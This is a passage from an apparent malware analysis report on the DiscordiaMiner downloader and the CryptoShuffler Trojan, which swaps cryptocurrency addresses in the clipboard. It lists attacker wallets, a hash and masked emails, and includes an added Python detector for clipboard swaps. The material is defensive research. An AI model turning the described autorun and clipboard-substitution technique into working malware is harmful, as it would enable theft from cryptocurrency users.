He also mentions the figure of 200,000 infected machines. It is difficult to say how true this is. However, in the malware samples we received, the email that the “prosecutor” refers to appears often. Examples of other addresses: ilya-soro*****12@mail.ru, v*****re@gmail.com, topne*****arin@gmail.com, J*****m@yandex.ru, steamfa*****aunt1@mail.ru, me*****ook@gmail.com, x*****z@yandex.ru, piedmont*****lines@yahoo.com.

Among other things, in the course of the dispute the author mentions that the source codes of the Trojan DiscordiaMiner are now publicly available.

Indeed, the first line of the search results provides the link to the author’s repository.

In addition to the source code, which does indeed fully match the reconstructed Trojan code, the repository also includes very informative diagrams of the Trojan’s operation, samples of the documents used for distribution, and instructions for how exactly UAC is to be bypassed. The pictures below are taken from the repository (which is currently unavailable).

The source code is presented in full and, apparently, only the user-associated string (ClientID) varies from build to build.

Although the “dumping” of program source code is not unique, this case in many respects echoes the NukeBot story – the same disputes on a forum, followed by the author publishing the source code with the aim of “protecting honor and dignity”. Another common feature is the “minimalistic” design of both Trojans: NukeBot could only embed web injects into the browser, while DiscordiaMiner can only download and run files from a remote server. But we cannot say whether these two bots have any more specific connections.

It’s extremely rare for authors of mining software to become fabulously wealthy. With a few exceptions, the wallets used by attackers contain a total of $50-100, received from all incoming transfers during the entire period of the Trojan’s operation. However, there are those that do not go down the beaten path and profit in “alternative” ways. The authors of the CryptoShuffler Trojan belong in this category.

Kaspersky Lab products detect this Trojan as Trojan-Banker.Win32.CryptoShuffler.gen. The MD5 of the file in question is 0ad946c351af8b53eac06c9b8526f8e4.

The key feature of CryptoShuffler is the following: instead of wasting processor time on mining, the Trojan simply substitutes the sender’s address in the clipboard! This was seen earlier with WebMoney and Bitcoin, but this malware sample targets all popular cryptocurrencies.

As usually happens in the beginning, the Trojan writes itself into the registry for autoloading.

In later versions of the Trojan this procedure is slightly different: if the module is implemented as a dynamically loaded library, it is launched at startup via the rundll32 system utility. The name of the called procedure, which is also the main function of the library, is call_directx_9.

The Trojan creates a thread of execution that keeps the autorun registry key shown in the screenshot above from being changed.

The substitution itself is performed using the Windows clipboard API functions OpenClipboard / GetClipboardData / SetClipboardData.

The search for a wallet address in the string read from the clipboard is performed using regular expressions. Most popular cryptocurrency wallet addresses start with a fixed constant and have a fixed length, so regular expressions for them are easy to write. For example, a Bitcoin wallet address can be recognized by the digit “1” or “3” at the beginning of the string.
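Detection logic for the clipboard-swap pattern described above, written for this article as an added example (not Kaspersky's code): a regex classifier built on the fixed-prefix-plus-length property of wallet addresses, and a check over a clipboard history that flags one address being replaced by a different address of the same currency. The regexes, the constructed addresses and the snapshot list are assumptions; a real monitor would poll the clipboard through the OS API.

```python
import re
from typing import List, Optional, Tuple

# Address formats rely on the "fixed prefix plus known length" property the article
# describes. The patterns are written for this example and cover only the classic
# address forms (no Bech32 Bitcoin addresses, no Monero subaddresses).
WALLET_PATTERNS = {
    "BITCOIN":  re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "ETHEREUM": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "DOGECOIN": re.compile(r"^D[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}$"),
    "DASH":     re.compile(r"^X[1-9A-HJ-NP-Za-km-z]{33}$"),
    "ZCASH":    re.compile(r"^t1[1-9A-HJ-NP-Za-km-z]{33}$"),
    "MONERO":   re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
}


def classify_wallet(text: str) -> Optional[str]:
    """Return the currency whose address format `text` matches, or None."""
    candidate = text.strip()
    for currency, pattern in WALLET_PATTERNS.items():
        if pattern.match(candidate):
            return currency
    return None


def detect_clipboard_swaps(snapshots: List[str]) -> List[Tuple[str, str, str]]:
    """Flag consecutive clipboard snapshots in which a wallet address is replaced by a
    different address of the same currency, the signature of a clipboard hijacker
    such as CryptoShuffler. Returns (old_address, new_address, currency) tuples."""
    alerts = []
    previous = None
    for snapshot in snapshots:
        current = snapshot.strip()  # trailing newlines are not a content change
        if previous is not None and current != previous:
            old_kind, new_kind = classify_wallet(previous), classify_wallet(current)
            if old_kind is not None and old_kind == new_kind:
                alerts.append((previous, current, old_kind))
        previous = current
    return alerts


# Constructed clipboard history standing in for a polling loop.
USER_BTC = "1ExampLeSrcWaLLet2Addrxyz9ABCDEFGH"          # constructed payee address
HIJACK_BTC = "1v9UCfygQf3toN1vA5xyr7LhKmv9QWcwZ"          # Bitcoin wallet from the article's table
USER_ETH = "0x0123456789abcdef0123456789abcdef01234567"  # constructed address
SAMPLE_SNAPSHOTS = [
    "meeting notes for tuesday",
    USER_BTC,            # the user copies the payee's address
    HIJACK_BTC,          # a different Bitcoin address appears without a new copy: alert
    HIJACK_BTC + "\n",   # same address with a trailing newline: not a new swap
    USER_ETH,            # a different currency: treated as a genuine new copy
]

if __name__ == "__main__":
    for old, new, currency in detect_clipboard_swaps(SAMPLE_SNAPSHOTS):
        print(f"ALERT: {currency} address {old} replaced by {new}")
```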

The body of the Trojan stores the wallets corresponding to the supported cryptocurrencies. The main list looks like this:

Wallet                                      Currency
1v9UCfygQf3toN1vA5xyr7LhKmv9QWcwZ           BITCOIN
D7uMywpgSyvy9J2RkyQ2oozT4xTmSSWGgR          DOGECOIN
Xv4M3y36iu6Fc5ikk8XuQBDFMtRz2xFXKm          DASH
0xfb25b3d5ae0d6866da17c4de253ce439b71d0903  ETHEREUM
4ZFYNck6mZfG52RMdWThJEXq4Sjdszf719          MONERO
N6VeTbNiFG1oapzPZmeLLkkNC55FQGMTgr          ???
t1VVkuasB7pNHPES2ei6LCqP1hZWb5rfPrB         ZCASH
PM44dh7LNEjThgmscw8t5rb9LZqEPc2Upg          ???

The biggest profit reaches the cybercriminals’ pockets from users of Bitcoin wallets: at the time of writing, there were ~23 BTC on the balance of their wallet, which at the end of October amounted to approximately $140,000. The amounts in the remaining wallets range from tens to thousands of US dollars.

The malware described is a perfect example of a “rational” gain. The scheme of its operation is simple and effective: no access to pools, no network interaction, and no suspicious processor load.